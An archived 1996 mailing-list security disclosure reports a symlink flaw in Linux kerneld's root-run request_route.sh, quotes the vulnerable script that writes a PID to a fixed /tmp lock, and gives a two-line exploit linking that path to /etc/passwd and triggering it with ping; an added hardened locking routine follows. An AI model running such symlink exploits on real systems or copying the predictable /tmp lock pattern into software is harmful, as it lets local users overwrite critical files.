Bugtraq mailing list archives
[linux-security] Big security hole in kerneld's request_route
From: @ (Igor Chudov @ home)
Date: Thu, 13 Jun 1996 17:51:57 -0500
Hi,

I was just looking at sources of newly released linux 2.0. In modules-1.3.69k, in kerneld's subdirectory, there is a file request_route.sh (see below). It's supposed to run as root, whenever a route is requested. It is supposed to start pppd or something like that.

As it appears, it is possible to destroy system philes (such as /etc/passwd and so on).

Condition: you must have a system which has "on-demand loading" of pppd, whenever a route is requested.

Exploit:

you$ ln -s /etc/passwd /tmp/request-route
you$ ping 204.251.80.30

Internally kerneld starts request_route, request_route writes pid to the symlinked file, and the file pointed to by symlink is overwritten.

Did I miss something?

	- Igor.

#! /bin/sh
LOCK=/tmp/request-route
PATH=/usr/sbin:$PATH	# for ppp-2.2*
export PATH
# Note: you are _not_ forced to use ppp!
# You can do whatever you want in order to satisfy the kernel route request.
# It might be a good idea to set up the route as the default route, in case
# you are using e.g. slip or plip or any other net driver...
#
# This script will be called from kerneld with the requested route as $1
# Create a chat script for your nameserver (as defined in /etc/resolv.conf)
#
chatfile=/etc/ppp/chat.$1
if [ -f $chatfile ]
then
	#
	# Tune your favourite parameters to pppd, including the idle-disconnect option.
	# Kerneld will be automatically triggered to load slhc.o and ppp.o
	#
	pppd connect "chat -f $chatfile" /dev/modem 38400 \
		idle-disconnect 600 modem defaultroute noipdefault \
		&	# let pppd detach itself whenever it wants to...
	#
	# Timer to be killed by ip-up, tunable! Check kerneld delay as well
	#
	sleep 60 &
	sleepid=$!
	echo $sleepid > $LOCK
	wait $sleepid
	rm -f $LOCK
	exit 0
else
	exit 1
fi
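A hardened way for a root helper to take the lock, as an added example that is not the script from the post or from the modules package: keep the lock out of /tmp (a root-owned, non-world-writable directory, assumed here to be /var/run/request-route) and create it with noclobber so an existing path, symlink included, is refused instead of being written through. The directory and lock name are the caller's choice; nothing here is taken from the original package.

```shell
#!/bin/sh
# Added example: safe replacement for "echo $sleepid > $LOCK" in a
# kerneld-style helper. Defaults are assumptions, not package values.
LOCKDIR=${LOCKDIR:-/var/run/request-route}

# write_lock DIR NAME PID
# Returns 0 when a fresh regular file DIR/NAME holding PID was created,
# 1 when the write was refused (bad directory, path already exists,
# or the result is not a plain file we created ourselves).
write_lock() {
    dir=$1; lock=$1/$2; pid=$3

    # The lock directory must exist and must not be writable by others;
    # a world-writable directory (like /tmp) lets anyone plant a symlink
    # under the lock name before the privileged helper runs.
    [ -d "$dir" ] || return 1
    case $(ls -ld "$dir" | cut -c9) in
        w) return 1 ;;
    esac

    # Refuse any pre-existing path, whether a regular file, a fifo or a
    # symlink (dangling or not): a held lock or a planted name.
    if [ -e "$lock" ] || [ -L "$lock" ]; then
        return 1
    fi

    # noclobber makes the redirection fail instead of truncating an
    # existing target, so a file appearing between the check above and
    # this write is not overwritten.
    ( set -C; echo "$pid" > "$lock" ) 2>/dev/null || return 1

    # Post-condition: we must now own a plain file, not a symlink.
    if [ -L "$lock" ] || [ ! -f "$lock" ]; then
        rm -f "$lock"
        return 1
    fi
    return 0
}

# release_lock DIR NAME: remove the lock taken by write_lock.
release_lock() {
    rm -f "$1/$2"
}
```

Used in the helper, `write_lock "$LOCKDIR" request-route "$sleepid" || exit 1` replaces the bare redirection, and `release_lock` replaces the final `rm -f $LOCK`.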